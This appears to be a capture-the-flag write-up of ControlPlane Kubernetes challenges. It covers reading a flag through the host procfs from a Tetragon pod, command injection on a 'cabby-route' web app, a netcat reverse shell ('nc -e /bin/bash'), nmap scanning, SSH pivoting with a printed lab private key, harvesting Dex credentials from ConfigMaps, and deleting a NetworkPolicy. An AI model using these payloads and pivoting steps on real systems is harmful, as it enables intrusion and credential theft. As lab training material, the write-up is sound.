For the third flag, I spent a long time trying to get Tetragon to also include the contents of a file that is being read. However, that led nowhere, so back to the drawing board.

Thinking from scratch: Tetragon has access to the host’s procfs, as that’s where it gets some of its details. The host’s procfs includes the processes for all pods running on that node, including compromised-pod. Each process’s procfs entry includes a link to its root filesystem (/proc/<pid>/root), from which we can reach /mnt/. So let’s search for that.

$ kubectl -n tetragon exec -ti tetragon-gprqs -c tetragon -- bash

$ mount

$ cat /proc/self/mounts

overlay / overlay rw,relatime,lowerdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/83/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/82/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/81/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/80/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/79/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/78/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/77/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/76/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/74/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/73/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/70/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/68/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/67/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/66/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/64/fs,upperdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/84/fs,workdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/84/work,uuid=on,nouserxattr 0 0

proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0

tmpfs /dev tmpfs rw,nosuid,size=65536k,mode=755,inode64 0 0

devpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666 0 0

mqueue /dev/mqueue mqueue rw,nosuid,nodev,noexec,relatime 0 0

sysfs /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0

cgroup /sys/fs/cgroup cgroup2 rw,nosuid,nodev,noexec,relatime 0 0

proc /procRoot proc rw,nosuid,nodev,noexec,relatime 0 0

systemd-1 /procRoot/sys/fs/binfmt_misc autofs rw,relatime,fd=29,pgrp=0,timeout=0,minproto=5,maxproto=5,direct,pipe_ino=2158 0 0

binfmt_misc /procRoot/sys/fs/binfmt_misc binfmt_misc rw,nosuid,nodev,noexec,relatime 0 0

/dev/root /etc/hosts ext4 rw,relatime,discard,errors=remount-ro 0 0

/dev/root /dev/termination-log ext4 rw,relatime,discard,errors=remount-ro 0 0

/dev/root /etc/hostname ext4 rw,relatime,discard,errors=remount-ro 0 0

/dev/root /etc/resolv.conf ext4 rw,relatime,discard,errors=remount-ro 0 0

shm /dev/shm tmpfs rw,nosuid,nodev,noexec,relatime,size=65536k,inode64 0 0

/dev/root /etc/tetragon/tetragon.conf.d ext4 ro,relatime,discard,errors=remount-ro 0 0

bpf /sys/fs/bpf bpf rw,nosuid,nodev,noexec,relatime,mode=700 0 0

tmpfs /run/cilium tmpfs rw,nosuid,nodev,size=801224k,nr_inodes=819200,mode=755,inode64 0 0

none /run/cilium/cgroupv2 cgroup2 rw,relatime 0 0

tmpfs /run/cilium/tetragon tmpfs rw,nosuid,nodev,size=801224k,nr_inodes=819200,mode=755,inode64 0 0

tmpfs /run/secrets/kubernetes.io/serviceaccount tmpfs ro,relatime,size=3903716k,inode64,noswap 0 0

/sys/kernel/debug /sys/kernel/debug debugfs rw,relatime 0 0

/run/tetragon/cgroup2 /run/tetragon/cgroup2 cgroup2 rw,relatime 0 0

tracefs /sys/kernel/debug/tracing tracefs rw,relatime 0 0

$ cat /proc/self/mounts | grep proc

proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0

proc /procRoot proc rw,nosuid,nodev,noexec,relatime 0 0

systemd-1 /procRoot/sys/fs/binfmt_misc autofs rw,relatime,fd=29,pgrp=0,timeout=0,minproto=5,maxproto=5,direct,pipe_ino=2158 0 0

binfmt_misc /procRoot/sys/fs/binfmt_misc binfmt_misc rw,nosuid,nodev,noexec,relatime 0 0

$ cd /procRoot/

$ ls

1 13 21 3224 38726 47 58 86048 dma loadavg sysrq-trigger

10 134 2118 33 3875 474 580 89212 driver locks sysvipc

100430 14 2150 3326 39 477 59 90 dynamic_debug mdstat thread-self

100437 15 22 3349 3903 479 596 91 execdomains meminfo timer_list

100650 16 23 3368 3917 48 6 91510 fb misc tty

105301 169 2394 3378 3938 481 60 92 filesystems modules uptime

105642 17 2415 3391 4 484 61 94421 fs mounts version

106510 171 2496 34 40 49 618 96230 interrupts mtrr version_signature

106985 172 25 3417 4046 490 62 97025 iomem net vmallocinfo

107248 173 2517 3476 41 491 63 acpi ioports pagetypeinfo vmstat

108772 174 2561 3482 4138 495 64 bootconfig irq partitions xen

109240 176 2573 349 42 5 65 buddyinfo kallsyms pressure zoneinfo

109241 18 26 35 43 51 66 bus kcore schedstat

109305 19 27 351 44 52 67 cgroups key-users scsi

109851 19628 2892 3543 45 53 68 cmdline keys self

109917 2 29 3630 454 54 7 consoles kmsg slabinfo

109938 20 3 3650 459 55 75 cpuinfo kpagecgroup softirqs

110020 2048 30 37 46 56 77 crypto kpagecount stat

12 205 3069 3747 460 57 81511 devices kpageflags swaps

1268 2098 31 38 46455 573 84257 diskstats latency_stats sys

So this is the host’s procfs. Let’s enumerate for the flag now, searching for the path from the original trace.

$ ls */root/mnt/sensitive_data/flag

ls: */root/mnt/sensitive_data/flag: No such file or directory

Nada. Weird, let’s see if it was just named differently.

node-1:/procRoot# ls */root/mnt/sensitive_data/

1/root/mnt/sensitive_data/:

flag_3

10/root/mnt/sensitive_data/:

flag_3

[..SNIP..]

It was. It also looks to be on the host filesystem, as it’s present under PID 1 too. It turns out the file is called flag_3; attackers can’t even get a filename right xD

$ cat 1/root/mnt/sensitive_data/flag_3

ZmxhZ19jdGZ7QUxFUlRfU2Vuc2l0aXZlRGF0YUFjY2Vzc2VkX0FMRVJUfQo=

$ base64 -d <<< ZmxhZ19jdGZ7QUxFUlRfU2Vuc2l0aXZlRGF0YUFjY2Vzc2VkX0FMRVJUfQo=

flag_ctf{ALERT_SensitiveDataAccessed_ALERT}
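The search above boils down to walking every numeric entry in the mounted procfs and looking under its root link. A sketch of the same idea in Python, assuming the host procfs is mounted at some directory (here /procRoot, as in the Tetragon container); the demo builds a fake tree in a temporary directory so it can run anywhere, and the function name is my own:

```python
import tempfile
from pathlib import Path


def find_via_proc_root(proc_root: Path, relative: str) -> list[Path]:
    """Look for `relative` under <proc_root>/<pid>/root for every PID entry."""
    hits: list[Path] = []
    for entry in sorted(proc_root.iterdir()):
        if not entry.name.isdigit():
            continue  # skip non-process entries such as 'self' or 'meminfo'
        candidate = entry / "root" / relative
        try:
            if candidate.is_dir():
                hits.extend(sorted(candidate.iterdir()))
            elif candidate.exists():
                hits.append(candidate)
        except OSError:
            continue  # process exited or access was denied
    return hits


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        fake_proc = Path(tmp)
        # Fake PID 1 whose root contains the directory from the trace.
        data_dir = fake_proc / "1" / "root" / "mnt" / "sensitive_data"
        data_dir.mkdir(parents=True)
        (data_dir / "flag_3").write_text("placeholder\n")
        # Fake PID 2 without the directory, plus a non-PID entry.
        (fake_proc / "2" / "root").mkdir(parents=True)
        (fake_proc / "meminfo").write_text("")

        for path in find_via_proc_root(fake_proc, "mnt/sensitive_data"):
            print(path.relative_to(fake_proc))
```

On the challenge box the call would be find_via_proc_root(Path("/procRoot"), "mnt/sensitive_data").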

There is the third and final flag. That was a fun one, never used Tetragon before.

Challenge 3 - Cabby

The final challenge. I did get told by ControlPlane that I should really like this one before starting. My hopes are high xD

SSHing, we are greeted with the following:

[\

.----' `-----.

//^^^^;;^^^^^^`\

_______//_____||_____()_\________

/ : : ___ `\

|> ____; ; |/\><| ____ _<)

{____/ \_________________/ \____}

\ '' / \ '' /

'--' '--'

Navigating London is difficult. Often the direct route is not the quickest or correct one.

A hacker has eyes on a company called "cabby-route" but is struggling to find a route in.

Help them out and obtain the discount code to travel for free across the city.

Interesting, let’s see if we have any permissions.

$ kubectl auth can-i --list

bash: kubectl: command not found

No kubectl, we’re low privileged so can’t install things, and can’t seem to connect back out to the internet. Great. ControlPlane have a tendency to put starting files in the home directory of the user you SSH in as, let’s see if there is anything there.

$ cd

$ ls

hacker-notes.md jumpbox.key

Nice, we have a couple of files.

# Hacker Notes

Author: elitehexor

## Target

Getting around London is massive pain, Uber just isn't cutting it and I want to use the local cabby's.

They are just so expensive but I've heard from a redit forum there is a special, executives discount for

"cabby-route". I know it's called "FLAG-DOWN" but I don't know the code... Time to Hack!

## Recon

I've managed to find the ssh key to their jumpbox but unfortunately access is blocked externally.

If only I could get a foothold on their network, I bet they've not applied egress filtering (NO ONE DOES!)

I've found the cabby-route frontend at: `http://cabby-route.kubesim.tech:8080/`

Accessible via: `ssh -F simulator_config -L 8080:localhost:8080 -N bastion`

## Exploit

¯\_(ツ)_/¯

-----BEGIN OPENSSH PRIVATE KEY-----

b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW

QyNTUxOQAAACB7M447HwzJ6c2RwOaHO+EYbYd8a32pzM4098KHLfwn/AAAAJhy6JJIcuiS

SAAAAAtzc2gtZWQyNTUxOQAAACB7M447HwzJ6c2RwOaHO+EYbYd8a32pzM4098KHLfwn/A

AAAEB+wR3YRTPnVFYnxt9TlAygMLWQIxdCb/xGQz4SYl0YHXszjjsfDMnpzZHA5oc74Rht

h3xrfanMzjT3woct/Cf8AAAAFW9wc0BjYWJieS1yb3V0ZS5sb2NhbA==

-----END OPENSSH PRIVATE KEY-----

OK, so we have a target - the website http://cabby-route.kubesim.tech:8080/. Let’s set up the port-forward and have a play.

I swapped the SSH command to use port 8081 locally (-L 8081:localhost:8080), as I need BurpSuite on 8080, and added cabby-route.kubesim.tech to my /etc/hosts file.



Interesting. Roaming the site, there are a few things of interest. A potential injection point:

Some hints.

More injection points.



All of this is going through BurpSuite as I roam, and nothing much else of note was observed. Let’s start with the first injection point. After some playing around, I noticed there is RCE. For example, with ; id, we get the following:

As I’m lazy about managing all these screenshots, I’ll just post the commands and output where needed.

Now that we have code execution, let’s expand that to a reverse shell. Enumeration of available binaries suggested that nc was not installed, but we are root and apt is present. Therefore we can install netcat-traditional, which supports the -e flag for an easy reverse shell.

; apt update; apt install -y netcat-traditional

#### WARNING: apt does not have a stable CLI interface. Use with caution in scripts. Get:1 http://security.ubuntu.com/ubuntu noble-security InRelease [126 kB] Get:2 http://security.ubuntu.com/ubuntu noble-security/universe amd64 Packages [1068 kB] Get:3 http://security.ubuntu.com/ubuntu noble-security/restricted amd64 Packages [1068 kB] Get:4 http://security.ubuntu.com/ubuntu noble-security/main amd64 Packages [920 kB] Get:5 http://security.ubuntu.com/ubuntu noble-security/multiverse amd64 Packages [21.9 kB] Hit:6 http://archive.ubuntu.com/ubuntu noble InRelease Get:7 http://archive.ubuntu.com/ubuntu noble-updates InRelease [126 kB] Get:8 http://archive.ubuntu.com/ubuntu noble-backports InRelease [126 kB] Get:9 http://archive.ubuntu.com/ubuntu noble-updates/universe amd64 Packages [1362 kB] Get:10 http://archive.ubuntu.com/ubuntu noble-updates/multiverse amd64 Packages [26.4 kB] Get:11 http://archive.ubuntu.com/ubuntu noble-updates/main amd64 Packages [1246 kB] Get:12 http://archive.ubuntu.com/ubuntu noble-updates/restricted amd64 Packages [1119 kB] Get:13 http://archive.ubuntu.com/ubuntu noble-backports/universe amd64 Packages [30.9 kB] Get:14 http://archive.ubuntu.com/ubuntu noble-backports/main amd64 Packages [48.0 kB] Fetched 7288 kB in 9s (796 kB/s) Reading package lists... Building dependency tree... Reading state information... 22 packages can be upgraded. Run 'apt list --upgradable' to see them. WARNING: apt does not have a stable CLI interface. Use with caution in scripts. Reading package lists... Building dependency tree... Reading state information... The following NEW packages will be installed: netcat-traditional 0 upgraded, 1 newly installed, 0 to remove and 22 not upgraded. Need to get 61.3 kB of archives. After this operation, 138 kB of additional disk space will be used. 
Get:1 http://archive.ubuntu.com/ubuntu noble/universe amd64 netcat-traditional amd64 1.10-48 [61.3 kB] debconf: delaying package configuration, since apt-utils is not installed Fetched 61.3 kB in 1s (107 kB/s) Selecting previously unselected package netcat-traditional. (Reading database ... (Reading database ... 5% (Reading database ... 10% (Reading database ... 15% (Reading database ... 20% (Reading database ... 25% (Reading database ... 30% (Reading database ... 35% (Reading database ... 40% (Reading database ... 45% (Reading database ... 50% (Reading database ... 55% (Reading database ... 60% (Reading database ... 65% (Reading database ... 70% (Reading database ... 75% (Reading database ... 80% (Reading database ... 85% (Reading database ... 90% (Reading database ... 95% (Reading database ... 100% (Reading database ... 8630 files and directories currently installed.) Preparing to unpack .../netcat-traditional_1.10-48_amd64.deb ... Unpacking netcat-traditional (1.10-48) ... Setting up netcat-traditional (1.10-48) ... update-alternatives: using /bin/nc.traditional to provide /bin/nc (nc) in auto mode update-alternatives: warning: skip creation of /usr/share/man/man1/nc.1.gz because associated file /usr/share/man/man1/nc.traditional.1.gz (of link group nc) doesn't exist update-alternatives: warning: skip creation of /usr/share/man/man1/netcat.1.gz because associated file /usr/share/man/man1/nc.traditional.1.gz (of link group nc) doesn't exist

With nc installed, we can establish a reverse shell back to our server with ; nc -e /bin/bash IP PORT, where we have a listener waiting:

$ nc -nlvp 8080

Listening on 0.0.0.0 8080

Connection received on 35.176.16.175 15979

$ id

uid=0(root) gid=0(root) groups=0(root)

Excellent.

Now for enumeration.

$ env

KUBERNETES_SERVICE_PORT_HTTPS=443

KUBERNETES_SERVICE_PORT=443

CABBY_ROUTE_PORT=tcp://10.101.34.191:8080

CABBY_ROUTE_PORT_8080_TCP_PROTO=tcp

HOSTNAME=cabby-route-649b678857-4m4w8

CABBY_ROUTE_PORT_8080_TCP_ADDR=10.101.34.191

CABBY_ROUTE_SERVICE_PORT=8080

PWD=/var/www

FLAG_1=flag_ctf{TEMPLATE_INJECTED_FOOTHOLD_IN_CABBY_ROUTE}

HOME=/root

KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443

CABBY_ROUTE_PORT_8080_TCP_PORT=8080

CABBY_ROUTE_PORT_8080_TCP=tcp://10.101.34.191:8080

SHLVL=1

CABBY_ROUTE_SERVICE_HOST=10.101.34.191

KUBERNETES_PORT_443_TCP_PROTO=tcp

KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1

KUBERNETES_SERVICE_HOST=10.96.0.1

KUBERNETES_PORT=tcp://10.96.0.1:443

KUBERNETES_PORT_443_TCP_PORT=443

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

_=/usr/bin/env

The first flag was found in the environment variables.

At this point, I started downloading a bunch of tools like kubectl, nmap, coredns-enum, and networking tools to try to find the next spot. Based on the hacker notes at the beginning, it looks like we need to find the jumpbox.

kubectl doesn’t seem to turn up much:

$ kubectl auth can-i --list

Resources Non-Resource URLs Resource Names Verbs

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

[/.well-known/openid-configuration/] [] [get]

[/.well-known/openid-configuration] [] [get]

[/api/*] [] [get]

[/api] [] [get]

[/apis/*] [] [get]

[/apis] [] [get]

[/healthz] [] [get]

[/healthz] [] [get]

[/livez] [] [get]

[/livez] [] [get]

[/openapi/*] [] [get]

[/openapi] [] [get]

[/openid/v1/jwks/] [] [get]

[/openid/v1/jwks] [] [get]

[/readyz] [] [get]

[/readyz] [] [get]

[/version/] [] [get]

[/version/] [] [get]

[/version] [] [get]

[/version] [] [get]

$ kubectl auth whoami

ATTRIBUTE VALUE

Username system:serviceaccount:public-services:default

UID 39eb31ee-0989-4bd0-9f2e-fd0d41275e5e

Groups [system:serviceaccounts system:serviceaccounts:public-services system:authenticated]

Extra: authentication.kubernetes.io/credential-id [JTI=94bac47c-f7c9-4358-8d10-569ae515671f]

Extra: authentication.kubernetes.io/node-name [node-1]

Extra: authentication.kubernetes.io/node-uid [0d84bbf5-243b-4c95-a6af-91f4188bc939]

Extra: authentication.kubernetes.io/pod-name [cabby-route-649b678857-4m4w8]

Extra: authentication.kubernetes.io/pod-uid [f8148905-49a2-4687-9ffc-b1d525a6cb10]

Neither did coredns-enum (although, talking to ControlPlane after the fact, it was meant to):

$ coredns-enum

+-------------+------------+--------------+--------------------+-----------+

| NAMESPACE | NAME | SVC IP | SVC PORT | ENDPOINTS |

+-------------+------------+--------------+--------------------+-----------+

| default | kubernetes | 10.96.0.1 | 443/tcp (https) | |

| | | 10.0.218.126 | 443/tcp (https) | |

| kube-system | kube-dns | 10.96.0.10 | 53/tcp (dns-tcp) | |

| | | | 9153/tcp (metrics) | |

| | | | 53/udp (dns) | |

+-------------+------------+--------------+--------------------+-----------+

Switching to nmap to start scanning and finding ranges, we use ip a to identify the pod IP. Maybe there is a pod without a service that is “acting” as a jumpbox.

To get started, let’s scan the /24 the pod is in. (The pod IP range is typically larger, but this is just a quick starting point.)
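As a minimal sketch of how that starting range is picked: the pod address is reported as a /32, so the /24 is simply a guess built from its first three octets. The helper name `to_slash24` is hypothetical and not part of the challenge tooling.

```shell
# Hypothetical helper: turn an IPv4 address into the /24 that contains it
# by dropping the last octet. This is a guess at a scan range, not the
# cluster's real pod CIDR.
to_slash24() {
  printf '%s.0/24\n' "${1%.*}"
}

# Example use (requires nmap, so left commented out):
# nmap "$(to_slash24 192.168.84.131)" -p 22
```

If this range turned up nothing, the next step would be widening the prefix rather than changing the approach.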

$ ip a

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000

link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00

inet 127.0.0.1/8 scope host lo

valid_lft forever preferred_lft forever

inet6 ::1/128 scope host

valid_lft forever preferred_lft forever

2: tunl0@NONE: <NOARP> mtu 1480 qdisc noop state DOWN group default qlen 1000

link/ipip 0.0.0.0 brd 0.0.0.0

4: eth0@if8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 8981 qdisc noqueue state UP group default qlen 1000

link/ether 66:83:6b:93:7f:e1 brd ff:ff:ff:ff:ff:ff link-netnsid 0

inet 192.168.84.131/32 scope global eth0

valid_lft forever preferred_lft forever

inet6 fe80::6483:6bff:fe93:7fe1/64 scope link

valid_lft forever preferred_lft forever

$ nmap 192.168.84.0/24 -p 22

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-03 15:21 UTC

Nmap scan report for ip-192-168-84-128.eu-west-2.compute.internal (192.168.84.128)

Host is up (0.000049s latency).

PORT STATE SERVICE

22/tcp open ssh

Nmap scan report for 192-168-84-129.envoy.projectcontour.svc.cluster.local (192.168.84.129)

Host is up (0.000042s latency).

PORT STATE SERVICE

22/tcp closed ssh

Nmap scan report for 192-168-84-130.discount-datastore.backend-services.svc.cluster.local (192.168.84.130)

Host is up (0.000047s latency).

PORT STATE SERVICE

22/tcp closed ssh

Nmap scan report for 192-168-84-132.jumpbox-ssh.dmz.svc.cluster.local (192.168.84.132)

Host is up (0.000071s latency).

PORT STATE SERVICE

22/tcp closed ssh

Nmap scan report for ip-192-168-84-133.eu-west-2.compute.internal (192.168.84.133)

Host is up (0.000048s latency).

PORT STATE SERVICE

22/tcp closed ssh

Nmap scan report for cabby-route-649b678857-4m4w8 (192.168.84.131)

Host is up (0.000021s latency).

PORT STATE SERVICE

22/tcp closed ssh

Nmap done: 256 IP addresses (6 hosts up) scanned in 36.58 seconds

OK, so while we don’t have a useful open SSH port, the reverse DNS names in the scan do identify 192-168-84-132.jumpbox-ssh.dmz.svc.cluster.local - so there is a service for a jumpbox that we didn’t find earlier?
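The reverse DNS names in the scan output follow the pattern dashed-ip.service.namespace.svc.cluster.local, so each one leaks a service name and a namespace. A small sketch for splitting them, assuming the cluster.local domain seen above; `parse_ptr` is a hypothetical helper name.

```shell
# Hypothetical helper: split a name such as
#   192-168-84-132.jumpbox-ssh.dmz.svc.cluster.local
# into pod IP, service and namespace. Assumes the cluster domain is
# cluster.local, as in the nmap output above.
parse_ptr() {
  name=${1%.svc.cluster.local}   # strip the fixed suffix
  ip_part=${name%%.*}            # first label: the dashed IP
  rest=${name#*.}                # remaining labels: service.namespace
  svc=${rest%%.*}
  ns=${rest#*.}
  ip=$(printf '%s' "$ip_part" | sed 's/-/./g')
  printf 'ip=%s service=%s namespace=%s\n' "$ip" "$svc" "$ns"
}

parse_ptr 192-168-84-132.jumpbox-ssh.dmz.svc.cluster.local
```

Run against the other names in the scan, the same helper also surfaces the discount-datastore service in backend-services.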

Anyway, we have the IP of a jumpbox pod. If SSH is not on 22, it could be on another port, so let’s nmap that.

$ nmap --top-ports 1000 192.168.84.132

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-03 15:23 UTC

Nmap scan report for 192-168-84-132.jumpbox-ssh.dmz.svc.cluster.local (192.168.84.132)

Host is up (0.000020s latency).

Not shown: 999 closed tcp ports (reset)

PORT STATE SERVICE

2222/tcp open EtherNetIP-1

Nmap done: 1 IP address (1 host up) scanned in 0.10 seconds

Nice, port 2222. Let’s grab the SSH key and try logging in after installing openssh-client.

ssh -p 2222 -i key 192.168.84.132 id 2>&1

Host key verification failed.

ssh -o StrictHostKeyChecking=no -p 2222 -i key 192.168.84.132 id 2>&1

Warning: Permanently added '[192.168.84.132]:2222' (ED25519) to the list of known hosts.

uid=0(root) gid=0(root) groups=0(root)

Nice, we are on the jumpbox, but working this way is slightly awkward. Let’s just quickly get a reverse shell on this in the same manner as before with netcat-traditional. Eventually after multiple apt commands, we are left with ssh -o StrictHostKeyChecking=no -p 2222 -i key 192.168.84.132.

$ nc -nlvp 8080

Listening on 0.0.0.0 8080

Connection received on 35.176.16.175 23982

id

uid=0(root) gid=0(root) groups=0(root)

Success!

Let’s do some basic enumeration and see what we have to hand.

$ kubectl auth can-i --list

Resources Non-Resource URLs Resource Names Verbs

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

configmaps [] [] [get list]

namespaces [] [] [get list]

[/.well-known/openid-configuration/] [] [get]

[/.well-known/openid-configuration] [] [get]

[/api/*] [] [get]

[/api] [] [get]

[/apis/*] [] [get]

[/apis] [] [get]

[/healthz] [] [get]

[/healthz] [] [get]

[/livez] [] [get]

[/livez] [] [get]

[/openapi/*] [] [get]

[/openapi] [] [get]

[/openid/v1/jwks/] [] [get]

[/openid/v1/jwks] [] [get]

[/readyz] [] [get]

[/readyz] [] [get]

[/version/] [] [get]

[/version/] [] [get]

[/version] [] [get]

[/version] [] [get]

$ kubectl get cm -o yaml

apiVersion: v1

items:

- apiVersion: v1

data:

dex: |

DEX="http://dex.dex.svc.cluster.local:5556/dex/token"

flag_2: |

flag_ctf{JUMPBOX_BREACHED_TIME_2_FIND_A_DISCOUNT_CODE}

id_token: |

ID_TOKEN=$(curl -s -X POST "$DEX" \

--data-urlencode "grant_type=password" \

--data-urlencode "client_id=discount-datastore" \

--data-urlencode "client_secret=d3cd79be8435ea331bf35bd733483660" \

--data-urlencode "username=ops@cabby-route.local" \

--data-urlencode "password=token4operations2check1datastore" \

--data-urlencode "scope=openid profile email" \

| jq -r '.id_token')

kind: ConfigMap

metadata:

creationTimestamp: "2025-04-03T09:38:31Z"

name: idtoken-config

namespace: dmz

resourceVersion: "1373"

uid: 88591798-4159-43f3-8066-5a6f4458042a

[..SNIP..]

That is flag 2, and we have some credentials for dex. Nice, we can grab that token. We can also list namespaces, so we can try to find the backend services that will probably have the code we are after. Let’s quickly check what permissions we have in all the namespaces.

kubectl get ns | awk '{print $1}' | grep -v NAME | while read ns ; do echo $ns; kubectl -n $ns auth can-i --list | grep -vE '^ ' | grep -v selfsubject; echo; done

backend-services

Resources Non-Resource URLs Resource Names Verbs

namespaces [] [] [get list]

pods [] [] [get list]

services [] [] [get list]

daemonsets.apps [] [] [get list]

deployments.apps [] [] [get list]

statefulsets.apps [] [] [get list]

cert-manager

Resources Non-Resource URLs Resource Names Verbs

namespaces [] [] [get list]

default

Resources Non-Resource URLs Resource Names Verbs

namespaces [] [] [get list]

dex

Resources Non-Resource URLs Resource Names Verbs

namespaces [] [] [get list]

pods [] [] [get list]

services [] [] [get list]

daemonsets.apps [] [] [get list]

deployments.apps [] [] [get list]

statefulsets.apps [] [] [get list]

dmz

Resources Non-Resource URLs Resource Names Verbs

configmaps [] [] [get list]

namespaces [] [] [get list]

hideout

Resources Non-Resource URLs Resource Names Verbs

networkpolicies.networking.k8s.io [] [] [get list delete]

namespaces [] [] [get list]

kube-node-lease

Resources Non-Resource URLs Resource Names Verbs

namespaces [] [] [get list]

kube-public

Resources Non-Resource URLs Resource Names Verbs

namespaces [] [] [get list]

kube-system

Resources Non-Resource URLs Resource Names Verbs

namespaces [] [] [get list]

projectcontour

Resources Non-Resource URLs Resource Names Verbs

namespaces [] [] [get list]

public-services

Resources Non-Resource URLs Resource Names Verbs

namespaces [] [] [get list]

pods [] [] [get list]

services [] [] [get list]

daemonsets.apps [] [] [get list]

deployments.apps [] [] [get list]

statefulsets.apps [] [] [get list]

Oh interesting, we have delete on network policies in the hideout namespace - this is the namespace we started in (it may have been suggested I take a peek at the permissions in hideout).

kubectl -n hideout get netpol

NAME POD-SELECTOR AGE

hideout-2-public-services-only term=hacker 5h56m

kubectl -n hideout delete netpol hideout-2-public-services-only

networkpolicy.networking.k8s.io "hideout-2-public-services-only" deleted

Nice, now our starting point should not be network restricted. We can connect to things directly from there. No more reverse shells.

$ chmod 600 jumpbox.key

$ ssh -i jumpbox.key -p 2222 root@192.168.84.132

The authenticity of host '[192.168.84.132]:2222 ([192.168.84.132]:2222)' can't be established.

ED25519 key fingerprint is SHA256:rxQFFs1sbd2aJM68BIqgnFqsUphA6roVTW+IaYelyYA.

This key is not known by any other names.

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

Warning: Permanently added '[192.168.84.132]:2222' (ED25519) to the list of known hosts.

__-------__

/ _---------_ \

/ / \ \

| | | |

|_|___________|_|

/-\| |/-\

| _ |\ 0 /| _ |

|(_)| \ ! / |(_)|

|___|__\_____!_____/__|___|

[_________|TAXI1|_________]

|||| ~~~~~~~~ ||||

`--' `--'

CABBY JUMPBOX: FOR USER ACCESS TO INTERNAL SERVICES

root@jumpbox-8d7444959-xxrbr:~#

Excellent. That should make life easier. The target is likely to be in backend-services. Let’s have a look at what’s in there.

root@jumpbox-8d7444959-xxrbr:~# kubectl -n backend-services get pods

NAME READY STATUS RESTARTS AGE

discount-datastore-55d8b7b6d-2n5jq 1/1 Running 0 5h59m

root@jumpbox-8d7444959-xxrbr:~# kubectl -n backend-services get svc

NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE

discount-datastore ClusterIP 10.105.35.145 <none> 5000/TCP 6h

There looks to be a service listening in there. This distracts us slightly from the token, but let’s keep going.

$ curl http://discount-datastore.backend-services:5000/

<a href="/swagger/doc.json">Moved Permanently</a>.

$ curl http://discount-datastore.backend-services:5000/swagger/doc.json

{

"schemes": [],

"swagger": "2.0",

"info": {

"description": "",

"title": "",

"contact": {},

"version": ""

},

"host": "",

"basePath": "api/v1",

"paths": {

"/admin/datastore/discount": {

"get": {

"description": "get",

"consumes": [

"application/json"

],

"produces": [

"application/json"

],

"tags": [

"datastore discount codes"

],

"summary": "get stored discount",

"responses": {

"200": {

"description": "OK",

"schema": {

"type": "string"

}

}

}

}

},

"/datastore/info": {

"get": {

"description": "get",

"consumes": [

"application/json"

],

"produces": [

"application/json"

],

"tags": [

"datastore info"

],

"summary": "get datastore info",

"responses": {

"200": {

"description": "OK",

"schema": {

"type": "string"

}

}

}

}

},

"/health": {

"get": {

"description": "get",

"consumes": [

"application/json"

],

"produces": [

"application/json"

],

"tags": [

"health check"

],

"summary": "get service health",

"responses": {

"200": {

"description": "OK",

"schema": {

"type": "string"

}

}

}

}

}

}

}
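In a Swagger 2.0 document the entries under paths are relative to basePath, and here basePath is given as api/v1 without a leading slash. A minimal sketch of joining the pieces into a request URL; `endpoint_url` is a hypothetical helper, and the host is the service address used in the curl above.

```shell
# Hypothetical helper: join host, Swagger basePath and a path entry,
# tolerating missing or duplicate slashes between the parts.
endpoint_url() {
  host=${1%/}
  base=${2#/}; base=${base%/}
  path=${3#/}
  printf '%s/%s/%s\n' "$host" "$base" "$path"
}

endpoint_url http://discount-datastore.backend-services:5000 api/v1 /admin/datastore/discount
endpoint_url http://discount-datastore.backend-services:5000 api/v1 /datastore/info
```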

Awesome, we have some details about the endpoints within this app. I assume the one we want is the admin one. Let’s get the token before messing with these.

$ export DEX="http://dex.dex.svc.cluster.local:5556/dex/token"

$ export ID_TOKEN=$(curl -s -X POST "$DEX" \

--data-urlencode "grant_type=password" \

--data-urlencode "client_id=discount-datastore" \

--data-urlencode "client_secret=d3cd79be8435ea331bf35bd733483660" \

--data-urlencode "username=ops@cabby-route.local" \

--data-urlencode "password=token4operations2check1datastore" \

--data-urlencode "scope=openid profile email" \

| jq -r '.id_token')

$ curl -H "Authorization: Bearer $ID_TOKEN" http://discount-datastore.backend-services:5000/api/v1/admin/datastore/discount

Only admins can access the discount codes

